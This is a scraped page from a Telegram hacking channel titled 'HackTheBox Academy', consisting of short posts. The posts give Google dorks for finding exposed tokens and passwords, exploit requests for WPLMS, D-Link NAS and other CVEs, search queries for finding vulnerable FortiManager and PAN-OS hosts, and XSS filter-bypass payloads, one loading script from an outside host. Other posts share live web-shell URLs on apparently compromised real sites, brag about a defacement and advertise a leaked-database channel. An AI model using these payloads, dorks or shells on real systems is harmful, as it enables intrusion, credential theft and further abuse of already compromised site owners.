HackTheBox Academy
Closed channel
🔴Learn About #Linux 🔴Learn About #Windows 🔴Learn About #CVE 🔴Learn About #EXPLOIT 🔴Learn About #Vulnerability ✅ADMIN : @NullByte0x1
Show more3 327
Subscribers
No data24 hours
-207 days
-9330 days
Posts Archive
3 327
🎩 About 100 Google Dork For Recon to Find Secret and Access_Tokens And Password:
"target.com" ".mlab.com password" "target.com" "access_key" "target.com" "access_token" "target.com" "amazonaws" "target.com" "api.googlemaps AIza" "target.com" "api_key" "target.com" "api_secret" "target.com" "apidocs" "target.com" "apikey" "target.com" "apiSecret" "target.com" "app_key" "target.com" "app_secret" "target.com" "appkey" "target.com" "appkeysecret" "target.com" "application_key" "target.com" "appsecret" "target.com" "appspot" "target.com" "auth" "target.com" "auth_token" "target.com" "authorizationToken" "target.com" "aws_access" "target.com" "aws_access_key_id" "target.com" "aws_key" "target.com" "aws_secret" "target.com" "aws_token" "target.com" "AWSSecretKey" "target.com" "bashrc password" "target.com" "bucket_password" "target.com" "client_secret" "target.com" "cloudfront" "target.com" "codecov_token" "target.com" "config" "target.com" "conn.login" "target.com" "connectionstring" "target.com" "consumer_key" "target.com" "credentials" "target.com" "database_password" "target.com" "db_password" "target.com" "db_username" "target.com" "dbpasswd" "target.com" "dbpassword" "target.com" "dbuser" "target.com" "dot-files" "target.com" "dotfiles" "target.com" "encryption_key" "target.com" "fabricApiSecret" "target.com" "fb_secret" "target.com" "firebase" "target.com" "ftp" "target.com" "gh_token" "target.com" "github_key" "target.com" "github_token" "target.com" "gitlab" "target.com" "gmail_password" "target.com" "gmail_username" "target.com" "herokuapp" "target.com" "internal" "target.com" "irc_pass" "target.com" "JEKYLL_GITHUB_TOKEN" "target.com" "key" "target.com" "keyPassword" "target.com" "ldap_password" "target.com" "ldap_username" "target.com" "login" "target.com" "mailchimp" "target.com" "mailgun" "target.com" "master_key" "target.com" "mydotfiles" "target.com" "mysql" "target.com" "node_env" "target.com" "npmrc _auth" "target.com" "oauth_token" "target.com" "pass" "target.com" "passwd" "target.com" "password" "target.com" "passwords" "target.com" "pem private" "target.com" "preprod" "target.com" "private_key" "target.com" "prod" "target.com" "pwd" "target.com" "pwds" "target.com" "rds.amazonaws.com password" "target.com" "redis_password" "target.com" "root_password" "target.com" "secret" "target.com" "secret.password" "target.com" "secret_access_key" "target.com" "secret_key" "target.com" "secret_token" "target.com" "secrets" "target.com" "secure" "target.com" "security_credentials" "target.com" "send.keys" "target.com" "send_keys" "target.com" "sendkeys" "target.com" "SF_USERNAME salesforce" "target.com" "sf_username" "target.com" "FIREBASE_API_JSON=" "target.com" " vim_settings.xml" "target.com" "slack_api" "target.com" "slack_token" "target.com" "sql_password" "target.com" "ssh" "target.com" "ssh2_auth_password" "target.com" "sshpass" "target.com" "staging" "target.com" "stg" "target.com" "storePassword" "target.com" "stripe" "target.com" "swagger" "target.com" "testuser" "target.com" "token" "target.com" "x-api-key" "target.com" "xoxb " "target.com" "xoxp"#Ethical_Hacker #Pentest #Recon ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security
3 327
↔️ CVE-2024-48990
❗️ Qualys discovered that needrestart, before version 3.8, allows local attackers to execute arbitrary code as root by tricking needrestart into running the Python interpreter with an attacker-controlled PYTHONPATH environment variable.
🖥 Exploit - POC
#Ethical_Hacker #Exploit #Vulnerability
#CVE #Pentest #Privilege_Escalation
➖➖➖➖➖➖➖➖➖
🌐 @HackTheBox_Academy
🌐 @HackTheBox_Security
3 327
http://grabatic.net
Web.Archive
For My Friends. As You Can See In The Channel History, Im Not A Defacer. This Is Only For My Fun Times And When I Don't Have Anything Important To Do Like Study Or Practice.I'm bored. #Fun_Time 😂
3 327
↔️ CVE-2024-0012 _ CVE-20249474
❗️Authentication Bypass and Authenticated Command Injection in Palo Alto PAN-OS
🖥 Nuclei_Templates
🖥 POC - Exploit
🖥 Metasploit_Exploit
🔎 Fofa:
body="Panos.browser.cookie.set"🔎Hunter.how:
product.name="Palo Alto"#CVE #Exploit #Vulnerability #Ethical_Hacker #Pentest #POC ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security
3 327
#XSS payloads to bypass WAF in URL context.
HTML + Double Encoding + Embedded bytes.
1.
JavaScript:"<Svg/OnLoad=alert%25%0A26lpar;1)>"2.
JavaScript:"\%0A74Svg/On%0ALoad=alert%25%0A26lpar;1%25%0A26rpar;>"3.
<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>
#XSS #Exploit #Vulnerability
#Ethical_Hacker #Pentest #WEB
➖➖➖➖➖➖➖➖➖
🌐 @HackTheBox_Academy
🌐 @HackTheBox_Security3 327
🟧 2 Shell Access For Practice.
❌ Plz dont remove the $SHELL, So EveryOne Can Use
https://rahatek.com/h3x.php
https://uk.reviewstel.com/.well-known/pki-validation/.H3X.php
3 327
↔️ CVE-2024-47575
❗️A missing authentication for critical function in FortiManager allows attacker to execute arbitrary code or commands via specially crafted requests.
🖥 POC - Exploit
🔎 Fofa:
app="FORTINET-FortiManager"🔎 Hunter.How
ip.port=="541"&&protocol.banner="xab"&&protocol.banner="fortinet"🔎 ZoomEye:
title="FortiManager"#CVE #Exploit #Vulnerability #Ethical_Hacker #Pentest #POC ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security
3 327
We made New Channel For Our Nasty Items To prevent blocking This Channel From Telegram.
#Leaked_Database
#WebShells
#defacement_Archive
https://t.me/HackTheBox_DataBase
3 327
↔️ CVE-2024-10470
❗️WPLMS Learning Management System for WordPress <= 4.962 – Unauthenticated Arbitrary File Read and Deletion
👩💻 POC:
POST /wp-content/themes/wplms/setup/installer/envato-setup-export.php HTTP/1.1 Host: kubernetes.docker.internal Content-Type: application/x-www-form-urlencoded Content-Length: 29 download_export_zip=1&zip_file=.htaccess🔎fofa.info:
body="/wp-content/plugins/wplms_plugin/"
#CVE #Exploit #Vulnerability
#Ethical_Hacker #Pentest #POC
➖➖➖➖➖➖➖➖➖
🌐 @HackTheBox_Academy
🌐 @HackTheBox_Security3 327
🩸🩸🫵🩸🩸🩸 💥
🕷 Practical Phishing Campaigns.
#Ethical_Hacker #Course #Red_Team
#Pentest #Hacking #Phishing
➖➖➖➖➖➖➖➖➖
🌐 @HackTheBox_Academy
🌐 @HackTheBox_Security
3 327
↔️ CVE-2024-10914
❗️A command injection vulnerability has been identified in the account_mgr.cgi URI of certain D-Link NAS devices.
👩💻 POC:
curl "http://[Target-IP]/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27"
🔎fofa.info:
app="D_Link-DNS-ShareCenter"#CVE #Exploit #Vulnerability #Ethical_Hacker #Pentest #POC ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security
3 327
🌎 How To Put Hidden Messages in Pictures.
#Course #Ethical_Hacker
#Steganography #Security
➖➖➖➖➖➖➖➖➖
🌐 @HackTheBox_Academy
🌐 @HackTheBox_Security
3 327
📌 The Web Application Hacker's Handbook
#BOOK
#Pentest #Ethical_Hacker #Web
#Hacking #Red_Team #Security
➖➖➖➖➖➖➖➖➖
🌐 @HackTheBox_Academy
🌐 @HackTheBox_Security
3 327
#Fortinet_Fortigate_XSS_Bypass.
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a()%20x>
#XSS #Ethical_Hacker #Web
#Waf #Bypass #Pentest
➖➖➖➖➖➖➖➖➖
🌐 @HackTheBox_Academy
🌐 @HackTheBox_Security